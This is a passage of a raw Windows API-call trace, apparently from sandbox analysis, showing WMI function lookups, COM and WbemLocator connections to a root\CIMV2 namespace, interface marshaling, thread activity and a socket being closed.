GetProcAddress (hModule=0x73150000, lpProcName="ResetSecurity") returned 0x73151944 [0060.669] GetProcAddress (hModule=0x73150000, lpProcName="SetSecurity") returned 0x73151986 [0060.671] GetProcAddress (hModule=0x73150000, lpProcName="BlessIWbemServices") returned 0x731519cc [0060.674] GetProcAddress (hModule=0x73150000, lpProcName="BlessIWbemServicesObject") returned 0x73151a1e [0060.677] GetProcAddress (hModule=0x73150000, lpProcName="GetPropertyHandle") returned 0x73151a70 [0060.679] GetProcAddress (hModule=0x73150000, lpProcName="WritePropertyValue") returned 0x73151a89 [0060.681] GetProcAddress (hModule=0x73150000, lpProcName="Clone") returned 0x73151aa2 [0060.683] GetProcAddress (hModule=0x73150000, lpProcName="VerifyClientKey") returned 0x73152270 [0060.685] GetProcAddress (hModule=0x73150000, lpProcName="GetQualifierSet") returned 0x73151d73 [0060.688] GetProcAddress (hModule=0x73150000, lpProcName="Get") returned 0x73151b96 [0060.690] GetProcAddress (hModule=0x73150000, lpProcName="Put") returned 0x73151b7a [0060.692] GetProcAddress (hModule=0x73150000, lpProcName="Delete") returned 0x73151bb5 [0060.694] GetProcAddress (hModule=0x73150000, lpProcName="GetNames") returned 0x73151bc8 [0060.697] GetProcAddress (hModule=0x73150000, lpProcName="BeginEnumeration") returned 0x73151be4 [0060.699] GetProcAddress (hModule=0x73150000, lpProcName="Next") returned 0x73151bf7 [0060.703] GetProcAddress (hModule=0x73150000, lpProcName="EndEnumeration") returned 0x73151c16 [0060.705] GetProcAddress (hModule=0x73150000, lpProcName="GetPropertyQualifierSet") returned 0x73151c26 [0060.708] GetProcAddress (hModule=0x73150000, lpProcName="Clone") returned 0x73151aa2 [0060.708] GetProcAddress (hModule=0x73150000, lpProcName="GetObjectText") returned 0x73151c3c [0060.711] GetProcAddress (hModule=0x73150000, lpProcName="SpawnDerivedClass") returned 0x73151c52 [0060.714] GetProcAddress (hModule=0x73150000, lpProcName="SpawnInstance") returned 0x73151c68 [0060.716] GetProcAddress (hModule=0x73150000, lpProcName="CompareTo") returned 0x73151c7e [0060.720] GetProcAddress (hModule=0x73150000, lpProcName="GetPropertyOrigin") returned 0x73151c94 [0060.722] GetProcAddress (hModule=0x73150000, lpProcName="InheritsFrom") returned 0x73151caa [0060.725] GetProcAddress (hModule=0x73150000, lpProcName="GetMethod") returned 0x73151cbd [0060.728] GetProcAddress (hModule=0x73150000, lpProcName="PutMethod") returned 0x73151cd9 [0060.731] GetProcAddress (hModule=0x73150000, lpProcName="DeleteMethod") returned 0x73151cf5 [0060.734] GetProcAddress (hModule=0x73150000, lpProcName="BeginMethodEnumeration") returned 0x73151d08 [0060.737] GetProcAddress (hModule=0x73150000, lpProcName="NextMethod") returned 0x73151d1b [0060.740] GetProcAddress (hModule=0x73150000, lpProcName="EndMethodEnumeration") returned 0x73151d37 [0060.742] GetProcAddress (hModule=0x73150000, lpProcName="GetMethodQualifierSet") returned 0x73151d47 [0060.745] GetProcAddress (hModule=0x73150000, lpProcName="GetMethodOrigin") returned 0x73151d5d [0060.748] GetProcAddress (hModule=0x73150000, lpProcName="QualifierSet_Get") returned 0x73151d86 [0060.751] GetProcAddress (hModule=0x73150000, lpProcName="QualifierSet_Put") returned 0x73151da2 [0060.754] GetProcAddress (hModule=0x73150000, lpProcName="QualifierSet_Delete") returned 0x73151dbb [0060.756] GetProcAddress (hModule=0x73150000, lpProcName="QualifierSet_GetNames") returned 0x73151dce [0060.759] GetProcAddress (hModule=0x73150000, lpProcName="QualifierSet_BeginEnumeration") returned 0x73151de4 [0060.762] GetProcAddress (hModule=0x73150000, lpProcName="QualifierSet_Next") returned 0x73151df7 [0060.765] GetProcAddress (hModule=0x73150000, lpProcName="QualifierSet_EndEnumeration") returned 0x73151e13 [0060.768] GetProcAddress (hModule=0x73150000, lpProcName="GetCurrentApartmentType") returned 0x73151d73 [0060.770] GetProcAddress (hModule=0x73150000, lpProcName="GetDemultiplexedStub") returned 0x731518fd [0060.773] GetProcAddress (hModule=0x73150000, lpProcName="CreateInstanceEnumWmi") returned 0x73151580 [0060.777] GetProcAddress (hModule=0x73150000, lpProcName="CreateClassEnumWmi") returned 0x731515f6 [0060.781] GetProcAddress (hModule=0x73150000, lpProcName="ExecQueryWmi") returned 0x7315169e [0060.784] GetProcAddress (hModule=0x73150000, lpProcName="ExecNotificationQueryWmi") returned 0x73151717 [0060.787] GetProcAddress (hModule=0x73150000, lpProcName="PutInstanceWmi") returned 0x73151790 [0060.790] GetProcAddress (hModule=0x73150000, lpProcName="PutClassWmi") returned 0x73151810 [0060.793] GetProcAddress (hModule=0x73150000, lpProcName="CloneEnumWbemClassObject") returned 0x73151890 [0060.796] GetProcAddress (hModule=0x73150000, lpProcName="ConnectServerWmi") returned 0x731524b7 [0060.799] CoCreateInstance (in: rclsid=0x731513a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x731512d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x7deeb38 | out: ppv=0x7deeb38*=0x1268848) returned 0x0 [0060.799] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1268848, strNetworkResource="\\\\LHNIWSJ\\root\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x7deeb84 | out: ppNamespace=0x7deeb84*=0x12826c8) returned 0x0 [0064.557] WbemLocator:IUnknown:QueryInterface (in: This=0x12826c8, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7deea54 | out: ppvObject=0x7deea54*=0x12ad974) returned 0x0 [0064.557] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x12ad974, pProxy=0x12826c8, pAuthnSvc=0x7deea9c, pAuthzSvc=0x7deea98, pServerPrincName=0x7deeaa8, pAuthnLevel=0x7deeaa0, pImpLevel=0x7deea8c, pAuthInfo=0x7deea90, pCapabilites=0x7deea94 | out: pAuthnSvc=0x7deea9c*=0xa, pAuthzSvc=0x7deea98*=0x0, pServerPrincName=0x7deeaa8, pAuthnLevel=0x7deeaa0*=0x6, pImpLevel=0x7deea8c*=0x2, pAuthInfo=0x7deea90, pCapabilites=0x7deea94*=0x1) returned 0x0 [0064.557] WbemLocator:IUnknown:Release (This=0x12ad974) returned 0x1 [0064.557] WbemLocator:IUnknown:QueryInterface (in: This=0x12826c8, riid=0x73151250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7deea48 | out: ppvObject=0x7deea48*=0x12ad998) returned 0x0 [0064.557] WbemLocator:IUnknown:QueryInterface (in: This=0x12826c8, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7deea44 | out: ppvObject=0x7deea44*=0x12ad974) returned 0x0 [0064.558] WbemLocator:IClientSecurity:SetBlanket (This=0x12ad974, pProxy=0x12826c8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0064.558] WbemLocator:IUnknown:Release (This=0x12ad974) returned 0x2 [0064.558] WbemLocator:IUnknown:Release (This=0x12ad998) returned 0x1 [0064.558] CoTaskMemFree (pv=0x129baf8) [0064.558] WbemLocator:IUnknown:Release (This=0x1268848) returned 0x0 [0064.558] WbemLocator:IUnknown:QueryInterface (in: This=0x12826c8, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7dee404 | out: ppvObject=0x7dee404*=0x12ad998) returned 0x0 [0064.558] WbemLocator:IUnknown:QueryInterface (in: This=0x12ad998, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x7dee3c0 | out: ppvObject=0x7dee3c0*=0x0) returned 0x80004002 [0064.558] WbemLocator:IUnknown:QueryInterface (in: This=0x12ad998, riid=0x7431e9fc*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x7dee2b4 | out: ppvObject=0x7dee2b4*=0x0) returned 0x80004002 [0064.559] WbemLocator:IUnknown:AddRef (This=0x12ad998) returned 0x3 [0064.559] CoGetContextToken (in: pToken=0x7dee24c | out: pToken=0x7dee24c) returned 0x0 [0064.559] WbemLocator:IUnknown:QueryInterface (in: This=0x12ad998, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7dee234 | out: ppvObject=0x7dee234*=0x12ad8f4) returned 0x0 [0064.559] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x12ad8f4, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x7dee23c | out: pCid=0x7dee23c*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0064.559] WbemLocator:IUnknown:Release (This=0x12ad8f4) returned 0x3 [0064.559] CoGetContextToken (in: pToken=0x7dee244 | out: pToken=0x7dee244) returned 0x0 [0064.559] WbemLocator:IUnknown:AddRef (This=0x12ad998) returned 0x4 [0064.559] WbemLocator:IUnknown:QueryInterface (in: This=0x12ad998, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7dee2b8 | out: ppvObject=0x7dee2b8*=0x12ad97c) returned 0x0 [0064.559] WbemLocator:IUnknown:Release (This=0x12ad998) returned 0x4 [0064.559] WbemLocator:IRpcOptions:Query (in: This=0x12ad97c, pPrx=0x12ad998, dwProperty=2, pdwValue=0x7dee2dc | out: pdwValue=0x7dee2dc) returned 0x80004002 [0064.559] WbemLocator:IUnknown:Release (This=0x12ad97c) returned 0x3 [0064.560] WbemLocator:IUnknown:Release (This=0x12ad998) returned 0x2 [0064.560] CoGetContextToken (in: pToken=0x7dee6b8 | out: pToken=0x7dee6b8) returned 0x0 [0064.560] CoGetContextToken (in: pToken=0x7dee678 | out: pToken=0x7dee678) returned 0x0 [0064.560] WbemLocator:IUnknown:AddRef (This=0x12ad998) returned 0x3 [0064.560] WbemLocator:IUnknown:QueryInterface (in: This=0x12ad998, riid=0x7dee6f4*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x7dee6f0 | out: ppvObject=0x7dee6f0*=0x12826c8) returned 0x0 [0064.560] WbemLocator:IUnknown:Release (This=0x12ad998) returned 0x3 [0064.560] WbemLocator:IUnknown:Release (This=0x12826c8) returned 0x2 [0064.560] WbemLocator:IUnknown:Release (This=0x12826c8) returned 0x1 [0064.582] SysStringLen (param_1=0x0) returned 0x0 [0064.582] GetLastError () returned 0x7e [0064.583] CoUninitialize () Thread: id = 100 os_tid = 0xd84 [0064.601] CoGetContextToken (in: pToken=0x7deea3c | out: pToken=0x7deea3c) returned 0x0 [0064.601] CoGetContextToken (in: pToken=0x7deea2c | out: pToken=0x7deea2c) returned 0x0 [0064.601] CoGetMarshalSizeMax (in: pulSize=0x7dee9f8, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x12ad998, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0 | out: pulSize=0x7dee9f8) returned 0x0 [0064.601] CoMarshalInterface (pStm=0x12aa788, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x12ad998, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0065.194] CoGetContextToken (in: pToken=0x7deea3c | out: pToken=0x7deea3c) returned 0x0 [0065.194] CoGetContextToken (in: pToken=0x7deea2c | out: pToken=0x7deea2c) returned 0x0 [0065.194] CoGetMarshalSizeMax (in: pulSize=0x7dee9f8, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x12b6e40, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0 | out: pulSize=0x7dee9f8) returned 0x0 [0065.194] CoMarshalInterface (pStm=0x12aa5f8, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x12b6e40, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 Thread: id = 114 os_tid = 0xcec [0065.178] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0065.180] CoGetClassObject (in: rclsid=0x127e2ec*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x742d9630*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x7f7f488 | out: ppv=0x7f7f488*=0x1290b30) returned 0x0 [0065.180] WbemLocator:IUnknown:QueryInterface (in: This=0x1290b30, riid=0x744097d4*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x7f7f2b8 | out: ppvObject=0x7f7f2b8*=0x0) returned 0x80004002 [0065.180] WbemLocator:IClassFactory:CreateInstance (in: This=0x1290b30, pUnkOuter=0x0, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7f7f2f0 | out: ppvObject=0x7f7f2f0*=0x12b74b8) returned 0x0 [0065.180] WbemLocator:IUnknown:QueryInterface (in: This=0x12b74b8, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7f7f094 | out: ppvObject=0x7f7f094*=0x12b74b8) returned 0x0 [0065.180] WbemLocator:IUnknown:QueryInterface (in: This=0x12b74b8, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x7f7f050 | out: ppvObject=0x7f7f050*=0x0) returned 0x80004002 [0065.181] WbemLocator:IUnknown:AddRef (This=0x12b74b8) returned 0x3 [0065.181] CoGetContextToken (in: pToken=0x7f7eedc | out: pToken=0x7f7eedc) returned 0x0 [0065.181] WbemLocator:IUnknown:QueryInterface (in: This=0x12b74b8, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7f7eec4 | out: ppvObject=0x7f7eec4*=0x0) returned 0x80004002 [0065.181] CoGetContextToken (in: pToken=0x7f7eed4 | out: pToken=0x7f7eed4) returned 0x0 [0065.181] WbemLocator:IUnknown:AddRef (This=0x12b74b8) returned 0x4 [0065.181] WbemLocator:IUnknown:QueryInterface (in: This=0x12b74b8, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7f7ef48 | out: ppvObject=0x7f7ef48*=0x0) returned 0x80004002 [0065.181] WbemLocator:IUnknown:Release (This=0x12b74b8) returned 0x3 [0065.181] WbemLocator:IUnknown:Release (This=0x12b74b8) returned 0x2 [0065.181] WbemLocator:IUnknown:Release (This=0x1290b30) returned 0x0 [0065.181] WbemLocator:IUnknown:Release (This=0x12b74b8) returned 0x1 [0065.181] CoGetContextToken (in: pToken=0x7f7f3e0 | out: pToken=0x7f7f3e0) returned 0x0 [0065.181] CoGetContextToken (in: pToken=0x7f7f3a0 | out: pToken=0x7f7f3a0) returned 0x0 [0065.181] WbemLocator:IUnknown:AddRef (This=0x12b74b8) returned 0x2 [0065.182] WbemLocator:IUnknown:QueryInterface (in: This=0x12b74b8, riid=0x7f7f41c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x7f7f418 | out: ppvObject=0x7f7f418*=0x12b74b8) returned 0x0 [0065.182] WbemLocator:IUnknown:Release (This=0x12b74b8) returned 0x2 [0065.182] WbemLocator:IUnknown:Release (This=0x12b74b8) returned 0x1 [0065.182] CoGetContextToken (in: pToken=0x7f7f45c | out: pToken=0x7f7f45c) returned 0x0 [0065.182] CoGetContextToken (in: pToken=0x7f7f41c | out: pToken=0x7f7f41c) returned 0x0 [0065.182] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x2 [0065.182] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0x7f7f498*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x7f7f494 | out: ppvObject=0x7f7f494*=0x12b3f50) returned 0x0 [0065.182] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.182] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.182] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x12b3f50, puCount=0x7f7f610 | out: puCount=0x7f7f610*=0x2) returned 0x0 [0065.182] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.182] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=8, puBuffLength=0x7f7f60c*=0x0, pszText=0x0 | out: puBuffLength=0x7f7f60c*=0x15, pszText=0x0) returned 0x0 [0065.182] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=8, puBuffLength=0x7f7f60c*=0x15, pszText="00000000000000000000" | out: puBuffLength=0x7f7f60c*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0065.182] CoCreateInstance (in: rclsid=0x731513a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x731512d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x7f7f0e8 | out: ppv=0x7f7f0e8*=0x12b7578) returned 0x0 [0065.182] WbemLocator:IWbemLocator:ConnectServer (in: This=0x12b7578, strNetworkResource="\\\\LHNIWSJ\\root\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x7f7f134 | out: ppNamespace=0x7f7f134*=0x1282bc8) returned 0x0 [0065.188] WbemLocator:IUnknown:QueryInterface (in: This=0x1282bc8, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7f7f004 | out: ppvObject=0x7f7f004*=0x12b6e1c) returned 0x0 [0065.189] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x12b6e1c, pProxy=0x1282bc8, pAuthnSvc=0x7f7f04c, pAuthzSvc=0x7f7f048, pServerPrincName=0x7f7f058, pAuthnLevel=0x7f7f050, pImpLevel=0x7f7f03c, pAuthInfo=0x7f7f040, pCapabilites=0x7f7f044 | out: pAuthnSvc=0x7f7f04c*=0xa, pAuthzSvc=0x7f7f048*=0x0, pServerPrincName=0x7f7f058, pAuthnLevel=0x7f7f050*=0x6, pImpLevel=0x7f7f03c*=0x2, pAuthInfo=0x7f7f040, pCapabilites=0x7f7f044*=0x1) returned 0x0 [0065.189] WbemLocator:IUnknown:Release (This=0x12b6e1c) returned 0x1 [0065.189] WbemLocator:IUnknown:QueryInterface (in: This=0x1282bc8, riid=0x73151250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7f7eff8 | out: ppvObject=0x7f7eff8*=0x12b6e40) returned 0x0 [0065.189] WbemLocator:IUnknown:QueryInterface (in: This=0x1282bc8, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7f7eff4 | out: ppvObject=0x7f7eff4*=0x12b6e1c) returned 0x0 [0065.189] WbemLocator:IClientSecurity:SetBlanket (This=0x12b6e1c, pProxy=0x1282bc8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0065.189] WbemLocator:IUnknown:Release (This=0x12b6e1c) returned 0x2 [0065.189] WbemLocator:IUnknown:Release (This=0x12b6e40) returned 0x1 [0065.189] CoTaskMemFree (pv=0x12b7750) [0065.189] WbemLocator:IUnknown:Release (This=0x12b7578) returned 0x0 [0065.189] WbemLocator:IUnknown:QueryInterface (in: This=0x1282bc8, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7f7e9b4 | out: ppvObject=0x7f7e9b4*=0x12b6e40) returned 0x0 [0065.189] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6e40, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x7f7e970 | out: ppvObject=0x7f7e970*=0x0) returned 0x80004002 [0065.189] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6e40, riid=0x7431e9fc*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x7f7e864 | out: ppvObject=0x7f7e864*=0x0) returned 0x80004002 [0065.190] WbemLocator:IUnknown:AddRef (This=0x12b6e40) returned 0x3 [0065.190] CoGetContextToken (in: pToken=0x7f7e7fc | out: pToken=0x7f7e7fc) returned 0x0 [0065.190] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6e40, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7f7e7e4 | out: ppvObject=0x7f7e7e4*=0x12b6d9c) returned 0x0 [0065.190] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x12b6d9c, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x7f7e7ec | out: pCid=0x7f7e7ec*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0065.190] WbemLocator:IUnknown:Release (This=0x12b6d9c) returned 0x3 [0065.190] CoGetContextToken (in: pToken=0x7f7e7f4 | out: pToken=0x7f7e7f4) returned 0x0 [0065.190] WbemLocator:IUnknown:AddRef (This=0x12b6e40) returned 0x4 [0065.190] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6e40, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7f7e868 | out: ppvObject=0x7f7e868*=0x12b6e24) returned 0x0 [0065.190] WbemLocator:IUnknown:Release (This=0x12b6e40) returned 0x4 [0065.190] WbemLocator:IRpcOptions:Query (in: This=0x12b6e24, pPrx=0x12b6e40, dwProperty=2, pdwValue=0x7f7e88c | out: pdwValue=0x7f7e88c) returned 0x80004002 [0065.190] WbemLocator:IUnknown:Release (This=0x12b6e24) returned 0x3 [0065.190] WbemLocator:IUnknown:Release (This=0x12b6e40) returned 0x2 [0065.190] CoGetContextToken (in: pToken=0x7f7ec68 | out: pToken=0x7f7ec68) returned 0x0 [0065.190] CoGetContextToken (in: pToken=0x7f7ec28 | out: pToken=0x7f7ec28) returned 0x0 [0065.190] WbemLocator:IUnknown:AddRef (This=0x12b6e40) returned 0x3 [0065.191] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6e40, riid=0x7f7eca4*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x7f7eca0 | out: ppvObject=0x7f7eca0*=0x1282bc8) returned 0x0 [0065.191] WbemLocator:IUnknown:Release (This=0x12b6e40) returned 0x3 [0065.191] WbemLocator:IUnknown:Release (This=0x1282bc8) returned 0x2 [0065.191] WbemLocator:IUnknown:Release (This=0x1282bc8) returned 0x1 [0065.191] SysStringLen (param_1=0x0) returned 0x0 [0065.191] GetLastError () returned 0x0 [0065.191] CoUninitialize () Thread: id = 122 os_tid = 0x0 Thread: id = 123 os_tid = 0x148 Thread: id = 124 os_tid = 0x810 Thread: id = 125 os_tid = 0x814 Thread: id = 126 os_tid = 0x2e4 Thread: id = 127 os_tid = 0xbf8 [0141.140] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0141.143] ResetEvent (hEvent=0x454) returned 1 [0141.143] GetLastError () returned 0x0 [0213.274] ReleaseSemaphore (in: hSemaphore=0x5fc, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0213.274] ReleaseSemaphore (in: hSemaphore=0x5fc, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0213.274] SetEvent (hEvent=0x454) returned 1 [0213.274] GetLastError () returned 0x0 [0263.297] shutdown (s=0x600, how=2) returned 0 [0263.330] GetLastError () returned 0x0 [0263.330] setsockopt (s=0x600, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0263.330] GetLastError () returned 0x0 [0263.330] closesocket (s=0x600) returned 0 [0263.330] GetLastError () returned 0x0 [0263.331] SetEvent 